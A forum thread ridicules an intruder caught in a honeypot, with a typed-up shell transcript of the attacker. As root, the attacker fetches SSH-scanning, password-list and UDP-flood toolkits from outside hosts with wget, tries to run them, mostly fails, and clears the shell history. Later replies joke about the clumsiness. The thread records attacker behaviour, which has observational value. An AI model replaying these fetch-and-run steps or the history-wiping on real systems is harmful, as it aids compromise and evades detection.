Honeypot wtf



  •  For some reason this seems funny to me.



  • www2:~# w
     09:06:10 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
    USER     TTY     FROM               LOGIN@   IDLE   JCPU   PCPU WHAT
    root     pts/0   10.34.18.5         09:06    0.00s  0.00s  0.00s w
    www2:~# wget
    wget: missing URL
    Usage: wget [OPTION]... [URL]...
    
    Try `wget --help' for more options.
    www2:~# wget http://fakehlds.com/fakehlds32.tar.gz
    --2011-01-20 09:06:22--  http://fakehlds.com/fakehlds32.tar.gz
    Connecting to fakehlds.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 148729 (145K) [application/x-gzip]
    Saving to: `fakehlds32.tar.gz
    
    100%[======================================>] 148,729      2K/s  eta 55s
    
    2011-01-20 09:06:24 (2 KB/s) - `fakehlds32.tar.gz' saved [148729/148729]
    www2:~# sudo apt-get install ruby1.8 libopenssl-ruby1.8
    bash: sudo: command not found
    www2:~# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
    ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme.
    www2:~# ls -a
    .                 ..                .debtags          .viminfo
    .aptitude         .profile          .bashrc           fakehlds32.tar.gz
    www2:~# wget http://203.128.7.10/~admin/ka.tar
    --2011-01-20 09:07:21--  http://203.128.7.10/~admin/ka.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 4884480 (4M) [application/x-tar]
    Saving to: `ka.tar
    
    100%[======================================>] 4,884,480    446K/s  eta 0s
    
    2011-01-20 09:07:33 (446 KB/s) - `ka.tar' saved [4884480/4884480]
    www2:~# tar xvf ka.tar
    a/1
    a/2
    a/3
    a/4
    a/5
    a/a
    a/common
    a/gen-pass.sh
    a/go.sh
    a/pass_file
    a/pscan2
    a/scam
    a/secure
    a/ss
    a/ssh-scan
    a/vuln.txt
    www2:~# rm -rf ka.tar
    www2:~# cd /var/spool/samba/a
    bash: cd: /var/spool/samba/a: No such file or directory
    www2:~# cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:~# cd /var
    www2:/var# cd /spool
    bash: cd: /spool: No such file or directory
    www2:/var# cd /samba
    bash: cd: /samba: No such file or directory
    www2:/var# cd /a
    bash: cd: /a: No such file or directory
    www2:/var# cd a
    bash: cd: a: No such file or directory
    www2:/var# cd spool
    www2:/var/spool# cd samba
    bash: cd: samba: No such file or directory
    www2:/var/spool# cd a
    bash: cd: a: No such file or directory
    www2:/var/spool# chmod +x *
    www2:/var/spool# ./go.sh 92
    bash: ./go.sh: command not found
    www2:/var/spool# wget http://203.128.7.10/~admin/udppl.tar
    --2011-01-20 09:09:19--  http://203.128.7.10/~admin/udppl.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10240 (10K) [application/x-tar]
    Saving to: `udppl.tar
    
    100%[======================================>] 10,240       3K/s  eta 2s
    
    2011-01-20 09:09:20 (3 KB/s) - `udppl.tar' saved [10240/10240]
    www2:/var/spool# tar xvf udppl.tar
    udp/udp.pl
    www2:/var/spool# chmod +x *
    www2:/var/spool# perl udp.pl
    bash: perl: command not found
    www2:/var/spool# wget http://203.128.7.10/~admin/k08.tgz
    --2011-01-20 09:09:51--  http://203.128.7.10/~admin/k08.tgz
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    www2:/var/spool# cd udp
    www2:/var/spool/udp# perl
    bash: perl: command not found
    www2:/var/spool/udp# udp.pl
    bash: udp.pl: command not found
    www2:/var/spool/udp# wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe
    --2011-01-20 09:10:20--  http://download.microsoft.com/download/win2000platform/
    SP/SP3/NT5/EN-US/W2Ksp3.exe
    Connecting to download.microsoft.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]
    Saving to: `W2Ksp3.exe
    
    100%[======================================>] 130,978,672  5225K/s  eta 0s
    
    2011-01-20 09:10:45 (5225 KB/s) - `W2Ksp3.exe' saved [130978672/130978672]
    www2:/var/spool/udp# wget http://203.128.7.10/~admin/k08.tgz
    --2011-01-20 09:11:00--  http://203.128.7.10/~admin/k08.tgz
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    www2:/var/spool/udp# wget http://203.128.7.10/~admin/udppl.tar
    --2011-01-20 09:11:11--  http://203.128.7.10/~admin/udppl.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10240 (10K) [application/x-tar]
    Saving to: `udppl.tar
    
    100%[======================================>] 10,240       4K/s  eta 1s
    
    2011-01-20 09:11:12 (4 KB/s) - `udppl.tar' saved [10240/10240]
    www2:/var/spool/udp# tar xvf udppl.tar
    udp/udp.pl
    www2:/var/spool/udp# ls -a
    .          ..         udp.pl     W2Ksp3.exe udppl.tar  udp
    www2:/var/spool/udp# cd udp
    www2:/var/spool/udp/udp# chmod +x *
    www2:/var/spool/udp/udp# perl udp.pl
    bash: perl: command not found
    www2:/var/spool/udp/udp# wget http://203.128.7.10/~admin/ka.tar
    --2011-01-20 09:12:13--  http://203.128.7.10/~admin/ka.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 4884480 (4M) [application/x-tar]
    Saving to: `ka.tar
    
    100%[======================================>] 4,884,480    591K/s  eta 0s
    
    2011-01-20 09:12:21 (591 KB/s) - `ka.tar' saved [4884480/4884480]
    www2:/var/spool/udp/udp# tar xvf ka.tar
    a/1
    a/2
    a/3
    a/4
    a/5
    a/a
    a/common
    a/gen-pass.sh
    a/go.sh
    a/pass_file
    a/pscan2
    a/scam
    a/secure
    a/ss
    a/ssh-scan
    a/vuln.txt
    www2:/var/spool/udp/udp# rm -rf ka.tar
    www2:/var/spool/udp/udp# 213.248.54.246
    bash: 213.248.54.246: command not found
    www2:/var/spool/udp/udp# cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool/samba/a
    bash: cd: /var/spool/samba/a: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool
    www2:/var/spool# cd samba
    bash: cd: samba: No such file or directory
    www2:/var/spool# cd ". "
    bash: cd: . : No such file or directory
    www2:/var/spool# cd a
    bash: cd: a: No such file or directory
    www2:/var/spool# cd /a
    bash: cd: /a: No such file or directory
    www2:/var/spool# ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:4c:a8🆎32:f4
              inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
              inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
              TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
              collisions:0 txqueuelen:1000
              RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)
    
    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
              TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
    www2:/var/spool#cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool# wget http://fakehlds.com/fakehlds64.tar.gz
    --2011-01-20 09:16:25--  http://fakehlds.com/fakehlds64.tar.gz
    Connecting to fakehlds.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 150995 (147K) [application/x-gzip]
    Saving to: `fakehlds64.tar.gz
    
    100%[======================================>] 150,995      18K/s  eta 7s
    
    2011-01-20 09:16:26 (18 KB/s) - `fakehlds64.tar.gz' saved [150995/150995]
    www2:/var/spool# sudo apt-get install ruby1.8 libopenssl-ruby1.8
    bash: sudo: command not found
    www2:/var/spool# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
    ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme.
    www2:/var/spool# cd ruby-1.8.7-p72
    bash: cd: ruby-1.8.7-p72: No such file or directory
    www2:/var/spool# tar xzvf ruby-1.8.7-p72.tar.gz
    tar: ruby-1.8.7-p72.tar.gz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    www2:/var/spool# ls -a
    .                 ..                mail              udppl.tar
    udp               fakehlds64.tar.gz
    www2:/var/spool# perl
    bash: perl: command not found
    www2:/var/spool# wget ely.uv.ro/scan.tar.gz
    --2011-01-20 09:18:18--  http://ely.uv.ro/scan.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool#  wget ely.uv.ro/john.tar.gz
    --2011-01-20 09:18:34--  http://ely.uv.ro/john.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget http://bodylanguage.uv.ro/unixcod.tar.gz
    --2011-01-20 09:18:55--  http://bodylanguage.uv.ro/unixcod.tar.gz
    Connecting to bodylanguage.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget www.shoarec.go.ro/udp.pl
    --2011-01-20 09:19:12--  http://www.shoarec.go.ro/udp.pl
    Connecting to shoarec.go.ro:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `udp.pl
    
    100%[======================================>] 0            2K/s  eta -1s
    
    2011-01-20 09:19:14 (2 KB/s) - `udp.pl' saved [19017/0]
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz
    --2011-01-20 09:19:33--  http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz;
    --2011-01-20 09:19:37--  http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:20:09--  http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:30:51--  http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# history -c
    www2:/var/spool# exit
    
    Connection to server closed.
    localhost:~# exit


  • @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform /SP/SP3/NT5/EN-US/W2Ksp3.exe
    Connecting to download.microsoft.com:80... connected.
    HTTP request sent, awaiting response... 200 OK Length: 130978672 (124M) [application/octet-stream]
    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.



  • @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.



  • @Evo said:

    @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.

    Actually, my favourite part was the complete ignorance of how paths work. Lots and lots and lots of cd commands... with/without a leading slash (obviously doesn't have a clue what that means), removing/adding subfolders to the path because the first cd didn't work, etc...

    (That, or the 6pt font that showed up when I first tried posting the <pre> block.)



  • @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying install ruby because  there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     



  • @Mcoder said:

    @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying install ruby because  there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     

    It was /var/spool/samba. Apparently the cheat sheet he was following assumed that /var/spool/samba was the current path, because then he tried to cd /var/spool/samba/a, which was supposed to be what he just unpackaged with tar.



  •  ...
    perl? not found
    try to download file
    perl? not found
    perl? not found
    download w2ksp3
    download file
    look at directory
    change permissions on directory
    perl? not found
    extract file
    ip address
    wrong directory
    wrong directory
    wrong dircectory
    ...
    check ethernet settings
    same wrong directory
    download another file
    try to install ruby
    perl? not found
    ...

     

    Someone in the comments said that w2k was probably a speed test, but I still don't see what that is supposed to for 403 errors or perl not existing.

     

    In other news how did you get the text?



  • @Chame1eon said:

    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".



  •  @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.



  • @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it. Oh, and I obviously had nothing better to do.



  • @anotherusername said:

    @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     



  • @Chame1eon said:

    @anotherusername said:
    @Chame1eon said:
    @anotherusername said:
    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".
    I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     



  • @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.



  • @Ronald said:

    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.



  • @Zemm said:

    @Ronald said:
    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    I never much liked putting VB inside Excel spreadsheets. It feels dirty and oh-so-wrong. The only spreadsheet I've done that to had to pull a page from the Internet and screen scrape some values off it, and Excel's built-in data import wizard was woefully inadequate for the task. And if the security settings didn't allow scripting (which the default won't), everything on the spreadsheet still worked except for the button that pulled those values.



  • @anotherusername said:

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    If only we could still harness the power of the flight simulator in excel 97 all would be right


Log in to reply